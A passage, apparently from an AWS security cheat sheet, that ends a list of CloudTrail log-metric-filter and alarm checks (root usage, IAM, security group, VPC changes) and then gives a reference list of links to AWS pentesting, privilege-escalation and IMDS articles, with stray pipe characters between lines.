* Ensure a log metric filter and alarm exist for usage of "root" account
|
||
* Ensure a log metric filter and alarm exist for IAM policy changes
|
||
* Ensure a log metric filter and alarm exist for CloudTrail configuration changes
|
||
* Ensure a log metric filter and alarm exist for AWS Management Console authentication failures
|
||
* Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs
|
||
* Ensure a log metric filter and alarm exist for S3 bucket policy changes
|
||
* Ensure a log metric filter and alarm exist for AWS Config configuration changes
|
||
* Ensure a log metric filter and alarm exist for security group changes
|
||
* Ensure a log metric filter and alarm exist for changes to NetworkAccess Control Lists (NACL)
|
||
* Ensure a log metric filter and alarm exist for changes to network gateways
|
||
* Ensure a log metric filter and alarm exist for route table changes
|
||
* Ensure a log metric filter and alarm exist for VPC changes
|
||
|
||
|
||
## References
|
||
|
||
* [An introduction to penetration testing AWS - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-aws/)
|
||
* [Cloud Shadow Admin Threat 10 Permissions Protect - CyberArk](https://www.cyberark.com/threat-research-blog/cloud-shadow-admin-threat-10-permissions-protect/)
|
||
* [My arsenal of AWS Security tools - toniblyx](https://github.com/toniblyx/my-arsenal-of-aws-security-tools)
|
||
* [AWS Privilege Escalation method mitigation - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
|
||
* [AWS CLI Cheatsheet - apolloclark](https://gist.github.com/apolloclark/b3f60c1f68aa972d324b)
|
||
* [Pacu Open source AWS Exploitation framework - RhinoSecurityLabs](https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/)
|
||
* [PACU Spencer Gietzen - 30 juil. 2018](https://www.youtube.com/watch?v=XfetW1Vqybw&feature=youtu.be&list=PLBID4NiuWSmfdWCmYGDQtlPABFHN7HyD5)
|
||
* [Cloud security instance metadata - PumaScan](https://pumascan.com/resources/cloud-security-instance-metadata/)
|
||
* [Privilege escalation in the Cloud: From SSRF to Global Account Administrator - Maxime Leblanc - Sep 1, 2018](https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6)
|
||
* [AWS - Cheatsheet - @Magnussen](https://www.magnussen.funcmylife.fr/article_35)
|
||
* [amazon-guardduty-user-guide PenTest Finding Types - @awsdocs](https://github.com/awsdocs/amazon-guardduty-user-guide/blob/master/doc_source/guardduty_pentest.md)
|
||
* [HOW I HACKED A WHOLE EC2 NETWORK DURING A PENETRATION TEST - by Federico Fernandez](https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/)
|
||
* [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)
|
||
* [Getting shell and data access in AWS by chaining vulnerabilities - Riyaz Walikar - Aug 29, 2019 ](https://blog.appsecco.com/getting-shell-and-data-access-in-aws-by-chaining-vulnerabilities-7630fa57c7ed)
|
||
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
|
||
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/) |